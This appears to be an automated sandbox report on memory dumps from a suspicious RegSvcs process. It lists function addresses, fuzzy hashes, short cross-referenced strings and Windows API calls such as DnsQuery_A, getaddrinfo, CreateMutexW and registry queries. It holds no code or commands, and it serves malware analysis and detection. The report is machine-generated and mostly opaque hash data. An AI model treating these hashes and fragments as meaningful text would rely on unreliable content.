Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb1db8c453ba5f506b8aaff74e83da9dfccff7d0344c8a16022cb42355ffcbe
Instruction ID: 6cf0ee66d4f7c2b11634f32a1f89bbe0d595be97c67d4df60d9691973055af39
Opcode Fuzzy Hash: 7fb1db8c453ba5f506b8aaff74e83da9dfccff7d0344c8a16022cb42355ffcbe
Instruction Fuzzy Hash: 24516132F015158BD714DB69C950B5EB7E3AFD8315F2A8079E809EB366DE34DD028B90

Uniqueness

Uniqueness Score: -1.00%

Function 00459C9B, Relevance: 5.2, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*_4q, xrefs: 00459D0F
, xrefs: 00459DDB
p=Q, xrefs: 00459E49
p>Q, xrefs: 00459CC5

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: $*_4q$p=Q$p>Q
API String ID: 0-4199787386
Opcode ID: f243c1dbe6b36a7109475dea2ce6a6620455a82c2e577a6e9a52d55bf7720e65
Instruction ID: 84cbf48ab1b14e2590316a5530ce9072ca6f65ffd6c7f5aa23e87ae059ec6864
Opcode Fuzzy Hash: f243c1dbe6b36a7109475dea2ce6a6620455a82c2e577a6e9a52d55bf7720e65
Instruction Fuzzy Hash: 6951C231F04104CFDB14DF78D8445AEBBB2EBC5315724847BC90ADB292DB399D4A8B56

Uniqueness

Uniqueness Score: -1.00%

Function 0045A870, Relevance: 5.1, Strings: 4, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 0045A949
_4q, xrefs: 0045A87D
YQ, xrefs: 0045A8C7
hSQ, xrefs: 0045A8B3

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q$ YQ$hSQ$,
API String ID: 0-2790843274
Opcode ID: 900b90b146942e6c9870ea725539f371bd4819dba9728da42b283a86be1d53dc
Instruction ID: 0b9905392e334f0aec6862c09bfa21f5fdabd7d3a5f6c424b194aa908f14d33d
Opcode Fuzzy Hash: 900b90b146942e6c9870ea725539f371bd4819dba9728da42b283a86be1d53dc
Instruction Fuzzy Hash: 0441D8B0B006118BD714AB24C49466EBBD1BBC5305F25CA2BD84B8B742D778DC9ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 0045A860, Relevance: 5.1, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 0045A949
_4q, xrefs: 0045A87D
YQ, xrefs: 0045A8C7
hSQ, xrefs: 0045A8B3

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q$ YQ$hSQ$,
API String ID: 0-2790843274
Opcode ID: a27512ef38569b1198d0f022cbcacc15345db949d5097297ae99864398a8082f
Instruction ID: 859c36f31f36822c45591c1f9f932fcbfa750070356935316e5337371ab1460b
Opcode Fuzzy Hash: a27512ef38569b1198d0f022cbcacc15345db949d5097297ae99864398a8082f
Instruction Fuzzy Hash: 7431A7B0A046018BD714AF24C49466EBBD2FF85305F61CE1EC54B8B746DB78EC9ACB46

Uniqueness

Uniqueness Score: -1.00%

Function 0045B0AF, Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

oQ, xrefs: 0045B326
oQ, xrefs: 0045B342
kQ, xrefs: 0045B229

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: oQ$ oQ$kQ
API String ID: 0-865696344
Opcode ID: 99da8666fd11d9599772823ba8e65e8ddcba777ce02ac6788507b9a461b5d846
Instruction ID: 8dd5f794222feb72b55f1016333109f7a0d3f6fda1e9ea69c400a2ed48c7512c
Opcode Fuzzy Hash: 99da8666fd11d9599772823ba8e65e8ddcba777ce02ac6788507b9a461b5d846
Instruction Fuzzy Hash: 2481CF317016168BE708EB64C855BAEB7A2FF84300FA0852DE505AB7A5CF749D06CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00459738, Relevance: 3.9, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*_4q, xrefs: 00459785
p>Q, xrefs: 0045974E
, xrefs: 00459856

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: $*_4q$p>Q
API String ID: 0-3014719787
Opcode ID: 751adca9fcf02cafe1e7dbf5cc582a96a6ff393e5b2808ab7ed1074da5a498fa
Instruction ID: 735588af05a3a0f5363bfbd661fa9cb03fb541b4e057b2cb7db832387ed6c31b
Opcode Fuzzy Hash: 751adca9fcf02cafe1e7dbf5cc582a96a6ff393e5b2808ab7ed1074da5a498fa
Instruction Fuzzy Hash: EF51E471F18104CFCB14EF64C8845BE77B2EB85356B28847BC806DB752D639DC0A879A

Uniqueness

Uniqueness Score: -1.00%

Function 00459F18, Relevance: 3.8, Strings: 3, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h;Q, xrefs: 00459F60
8<Q, xrefs: 00459F1E
p=Q, xrefs: 00459F44

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8<Q$h;Q$p=Q
API String ID: 0-1296444136
Opcode ID: 135a7e4fd933302824bcdc217dc58896e0f5ce2e83366d010a66e6d133099640
Instruction ID: 18bf141ca85bb4cc37fe65c1ccc9c9417eee261931f66c437554007153f4ea0d
Opcode Fuzzy Hash: 135a7e4fd933302824bcdc217dc58896e0f5ce2e83366d010a66e6d133099640
Instruction Fuzzy Hash: E00116307401048FA748E7799028AAE3BE7AFC9269311407DE50ACB3A1EF359D898B95

Uniqueness

Uniqueness Score: -1.00%

Function 004512E8, Relevance: 3.0, Strings: 2, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=Vq, xrefs: 004513AC
`eSq, xrefs: 00451391

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: `eSq$=Vq
API String ID: 0-1636267196
Opcode ID: 5e7d6363e6e4a8b30cacbd020405c97fce457003acf0892f17c14c5fcf3ef725
Instruction ID: e8dad262eb7b9dc9ba3077f11dd31339925892ba542516ffa3546c081ef609ec
Opcode Fuzzy Hash: 5e7d6363e6e4a8b30cacbd020405c97fce457003acf0892f17c14c5fcf3ef725
Instruction Fuzzy Hash: 95222634A00A05CFDB64DF24C584A6AF7F2FF89314F20859AE84A9B756DB34AD85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 004581D0, Relevance: 2.9, Strings: 2, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!Q, xrefs: 004584F2
L!Q, xrefs: 0045858F

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: L!Q$!Q
API String ID: 0-1074541654
Opcode ID: 153bdca773937b8f332fe620a64252a6da708c9824a93f872371166d7cc014ed
Instruction ID: 5b2aaadd0918b0dca90da409722a4bff3814b6852c283c7059bcd26145dcad1d
Opcode Fuzzy Hash: 153bdca773937b8f332fe620a64252a6da708c9824a93f872371166d7cc014ed
Instruction Fuzzy Hash: 81020534600605CFDB14DB64C584AAEB7F2BF88311F2485AAE84AEB752DF34AC46CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457668, Relevance: 2.7, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HVq, xrefs: 004577A5
HVq, xrefs: 004577B1

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: 58088028757775d03c4cd91e51c050aa58b09fdc6a25f58be0a03c2812f59ec9
Instruction ID: baf1750a8dbee6d5de9b9cd11164003f87aa3fe6ddceaf78b73a69d8bdaf9264
Opcode Fuzzy Hash: 58088028757775d03c4cd91e51c050aa58b09fdc6a25f58be0a03c2812f59ec9
Instruction Fuzzy Hash: B9519F30B002158BDB08EBB5D4505AEB7F3BFC9714B24866AD809AB346DF38AD45CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 004514A0, Relevance: 2.6, Strings: 2, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`eSq, xrefs: 0045150F
=Vq, xrefs: 0045152A

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: `eSq$=Vq
API String ID: 0-1636267196
Opcode ID: 4896109387b0c1933f8ffdf09e426fe1a298dcf4980779d92813b5ff049a5cec
Instruction ID: f3f55ab4681e499588f5ad9e76505fefc21165ee14695462e00c9a86cebc1d13
Opcode Fuzzy Hash: 4896109387b0c1933f8ffdf09e426fe1a298dcf4980779d92813b5ff049a5cec
Instruction Fuzzy Hash: 6B513C34A00219CFD754EF64C894B9DB7B2BF89304F5041EAE80AAB366DB749D89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00452148, Relevance: 2.6, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HVq, xrefs: 00452184
HVq, xrefs: 00452178

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: 548bc7036cddeeca1ae510e909112860a35050a4fc94287398a8dfb68701abd9
Instruction ID: 01d0aa40eb1a0f7d88c71369aca88f072a1d8a7e0ba08bbc06456553426b87b8
Opcode Fuzzy Hash: 548bc7036cddeeca1ae510e909112860a35050a4fc94287398a8dfb68701abd9
Instruction Fuzzy Hash: FB31D434A04605CFDB04DFA4C98197F7BB1FF86701B2540ABD906EB246D7B4AD06CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00458BE0, Relevance: 2.6, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T0Q, xrefs: 00458BEB
r*+, xrefs: 00458CF7

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: T0Q$r*+
API String ID: 0-3506784706
Opcode ID: 704224255b145c18ee83d68caef8fa0864202eafbc3fd28ab32653aef749cca2
Instruction ID: fa29e91c601b0c169a17186d46340bf622315ef97748ece2cadeec11b766e5f7
Opcode Fuzzy Hash: 704224255b145c18ee83d68caef8fa0864202eafbc3fd28ab32653aef749cca2
Instruction Fuzzy Hash: A7413830E01209CFDB59DFA4C5456AEBBF1FF44301F20846ED802AB261DF395A49DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0045D770, Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

\(X, xrefs: 0045D7C9
xQ, xrefs: 0045D7E4

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: \(X$xQ
API String ID: 0-224579266
Opcode ID: 2ad01664e906966678e2bdb50400f29c3188b999a4cadbb1060883fb7e9cab64
Instruction ID: 8fe82411a34825cd4bf5f0b337f35f2d43d816448e63c9f19c540e06ede88f5d
Opcode Fuzzy Hash: 2ad01664e906966678e2bdb50400f29c3188b999a4cadbb1060883fb7e9cab64
Instruction Fuzzy Hash: C7313C747052048FDB49AF38D1181597BE1BB5931C32488ADE40AEF396DBB6994BCB80

Uniqueness

Uniqueness Score: -1.00%

Function 0045C9A0, Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

sQ, xrefs: 0045C9EB
sQ, xrefs: 0045CA1F

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: sQ$sQ
API String ID: 0-414255733
Opcode ID: 580f587eff62ee0d0c4f73383a8eaf396fdd67575adac1ebe286ba8f884f3b10
Instruction ID: d0ebdcad61876b5d6ab5b6148144049475441ae94a8c8cfdf1fd9a3949e26078
Opcode Fuzzy Hash: 580f587eff62ee0d0c4f73383a8eaf396fdd67575adac1ebe286ba8f884f3b10
Instruction Fuzzy Hash: E41102303003648FD745AB38A89472A3BA7FBD9B01F0544A8E406DB3D5EB708C95CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00458B58, Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

HVq, xrefs: 00458B8B
HVq, xrefs: 00458B97

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: 4a09f60e9b38e50fe10782e4c70c547805d09b79364dca578cce1ebf4cf3e621
Instruction ID: 03d268f4f01a2bb15c2dfdddab0bc9bd505e772ae9ea8d39c176a7af177b7635
Opcode Fuzzy Hash: 4a09f60e9b38e50fe10782e4c70c547805d09b79364dca578cce1ebf4cf3e621
Instruction Fuzzy Hash: E4E09235F001248B87945BE8AC1462D76EEEB8CAA2310026AED0AEB305DDB19C848BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004D214D, Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004D225D

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 146278a9e663d3dc660874741497472d0c65d052ad7fad1be5bc10cb63259d0f
Instruction ID: bf7c5f2fa2edf18a22ae05f0ce48ac0cce5653c75ae8b6e406e3cf6fab639dff
Opcode Fuzzy Hash: 146278a9e663d3dc660874741497472d0c65d052ad7fad1be5bc10cb63259d0f
Instruction Fuzzy Hash: 0241E4715093806FE712CB65DC55FA6FFB8EF06310F0884DBE9849B293D265A809C765

Uniqueness

Uniqueness Score: -1.00%

Function 004D1950, Relevance: 1.6, APIs: 1, Instructions: 127networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 004D1A46

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 7211651d794080a219af69233f2b249fe1a3357804d492e1f551d07a8ee06738
Instruction ID: dc8179503989efcdf40a80f52f36e7ccebf6c2639ac81f6d6faade55aa337676
Opcode Fuzzy Hash: 7211651d794080a219af69233f2b249fe1a3357804d492e1f551d07a8ee06738
Instruction Fuzzy Hash: 9241106540E7C06FD3138B309C61A61BF74AF47614B0E85CBE884CF6A3D259690AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0018AF50, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 0018AFEA

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 20eb7394afda6ad71234e904203b170d5712ba7b1b7fa9374ec7ed9e38928f84
Instruction ID: 64907813edee153a2bec7d64f78f2e53f472bdcce94e31ea94e3b48f5396e14f
Opcode Fuzzy Hash: 20eb7394afda6ad71234e904203b170d5712ba7b1b7fa9374ec7ed9e38928f84
Instruction Fuzzy Hash: BF31C47150E3C05FD7138B259C51B65BFB4EF47620F0941DBD884CB6A3D229A91DCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004D0EB8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 004D0F5B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 46fb25b647e24c2d157e4553c25c2403b07806969e02cfa5be3143cdc5777c89
Instruction ID: d8b2c0bdf3a418d9d375d9d0f0f002aaf0f8ed4d4c6e1e8d460824f54389b6bf
Opcode Fuzzy Hash: 46fb25b647e24c2d157e4553c25c2403b07806969e02cfa5be3143cdc5777c89
Instruction Fuzzy Hash: EE31B372504344AFEB228F65DC44FA7BFACEF05320F0489ABF985CB152D225E919DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D0C58, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E40,?,?), ref: 004D0D1A

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 25d48bf44f2174a22ccf866ba317ef70068aac6615316691a39cd0a45ceb15a6
Instruction ID: e334ad06b1c72c5e1a1e0640b60d6f6d1910e049490f6a5bbac3b7dda7bd63b4
Opcode Fuzzy Hash: 25d48bf44f2174a22ccf866ba317ef70068aac6615316691a39cd0a45ceb15a6
Instruction Fuzzy Hash: DA317C6140E3C05FD3038B259C61B62BFB4EF47620F0E85DBD8848F5A3D229A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004D3030, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E40), ref: 004D30F7

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: b39d3b75a879712bc9dadc8b7de07183822b4a866d00d8e96365de252629aff4
Instruction ID: c46e63fda3d354b3322ff29403751d197572a6b6b21b59973f22b90da6b46414
Opcode Fuzzy Hash: b39d3b75a879712bc9dadc8b7de07183822b4a866d00d8e96365de252629aff4
Instruction Fuzzy Hash: 37319FB2500345AFFB21DF51DC84FABFBACEB04710F0445ABFA489A182D275A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004D045E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 57316a1568f87d2ca2d92576764b4ad569b62c413e4cdaad4f4c4bad22bd9324
Instruction ID: 6fe2633fb26c8f3a7d80542730a3c72c25b01e0a95de4cbc0898abcb58c063c3
Opcode Fuzzy Hash: 57316a1568f87d2ca2d92576764b4ad569b62c413e4cdaad4f4c4bad22bd9324
Instruction Fuzzy Hash: 5431A172004740AFF722CF11DC45FA6FFB8EF06714F04459EEA859B192D2A5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0018AAB1

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e56b3b477f51dc4e49ecf8512cd8ffa84b48958b25b77b188a6e209d55d3ca13
Instruction ID: 27e1cec12fe0a92f19677524f8daa47e80843707dd3a4b72b785fbcc307e4035
Opcode Fuzzy Hash: e56b3b477f51dc4e49ecf8512cd8ffa84b48958b25b77b188a6e209d55d3ca13
Instruction Fuzzy Hash: 1331D472504380AFE722CF15DC45FA7BFACEF05310F0885ABE9858B552D264E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 004D07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004D0899

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 25a99559c556f87ecbe1d3bdfc082d162eee61fbf33ef913a80d020b37e82881
Instruction ID: cad1861330e66ca42407eed1aaddd3c024b5bb9b689fe95db62015f0d6debc56
Opcode Fuzzy Hash: 25a99559c556f87ecbe1d3bdfc082d162eee61fbf33ef913a80d020b37e82881
Instruction Fuzzy Hash: CC318D71504340AFE722CB65DC44F66FFE8EF05210F0884AEE9858B252D275E809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 004D2F3F, Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004D2FFA

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 381ce1a5c8df1e7d4a8c94f3546fcce86b408557d934cc0ac3ff0bf551591ccb
Instruction ID: 4a17f0519d07fd5c63386b21d56e01d47dde57d23cdf90cee209bdfec4fc4355
Opcode Fuzzy Hash: 381ce1a5c8df1e7d4a8c94f3546fcce86b408557d934cc0ac3ff0bf551591ccb
Instruction Fuzzy Hash: 81319F7290E7C05FD3138B219C61B56BFB4EF47610F1A81CBD884CF2A3E6256919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0018AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 0018ABB4

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7b51f0628bcd9d75c0f158968a6d6b281c486252026ae13cb9e46a529aafeb32
Instruction ID: 04e355f91cc98ab42cd49a2f636a188b6cb547e450fb4b7df590ff8cefe144b6
Opcode Fuzzy Hash: 7b51f0628bcd9d75c0f158968a6d6b281c486252026ae13cb9e46a529aafeb32
Instruction Fuzzy Hash: B73193755093849FE722CB65CC44FA2BFA8EF06710F0885DAE9458B192D264E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D2720, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D27BD

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 0ffc230160d9143c48d4a5b7c18e1aa67db84a2230b9d50db910379c0a48d3af
Instruction ID: f0346af12e2d1c700dacf4a6f147627436f85e3333f086e36e021b9ab8c7afe9
Opcode Fuzzy Hash: 0ffc230160d9143c48d4a5b7c18e1aa67db84a2230b9d50db910379c0a48d3af
Instruction Fuzzy Hash: 18312772505380AFEB128F24DD44BA6BFB8EF16310F0885DBE984CB193D225A905D775

Uniqueness

Uniqueness Score: -1.00%

Function 004D00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004D019D

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 5e78cc6a67f114c3b11f8a57e083c8499465f8689612898eb1d6ee13cf356c6a
Instruction ID: 33035f1b1d6193eb638f3c43f66aa15fc1c4f77c4b9025fb97b5a9506051e381
Opcode Fuzzy Hash: 5e78cc6a67f114c3b11f8a57e083c8499465f8689612898eb1d6ee13cf356c6a
Instruction Fuzzy Hash: 7C318F71509780AFE721CB65DC95B5AFFF8EF06310F08849BE9848B292D375A908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004D0FB9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D105C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 8c85b594c3e449ecc08f9c295e86dc543c5bbe9eeeac24871b99a36199fc2fcb
Instruction ID: a5e02a5b687b7ec888ed055b0eb864e3a4ce389fdebc93affa7b54b4c5f7c816
Opcode Fuzzy Hash: 8c85b594c3e449ecc08f9c295e86dc543c5bbe9eeeac24871b99a36199fc2fcb
Instruction Fuzzy Hash: 4E31D471509384AFE712CB24DC54FA6BFA8EF46310F0845DBE9848F2A3D625A948C761

Uniqueness

Uniqueness Score: -1.00%

Function 004D04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D055C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 934e62d44171af6e4de4b6f256a3c8f8919b7d618501293be28f5bdd0f14268f
Instruction ID: 982e8d9b6578afb36505f9bcb5e5230480b879a986e132fb0aa673eafd6ccf31
Opcode Fuzzy Hash: 934e62d44171af6e4de4b6f256a3c8f8919b7d618501293be28f5bdd0f14268f
Instruction Fuzzy Hash: 1731A271509780AFE722CB65DC54B92BFB8EF06310F0885DBE9858B292D225E908DB75

Uniqueness

Uniqueness Score: -1.00%

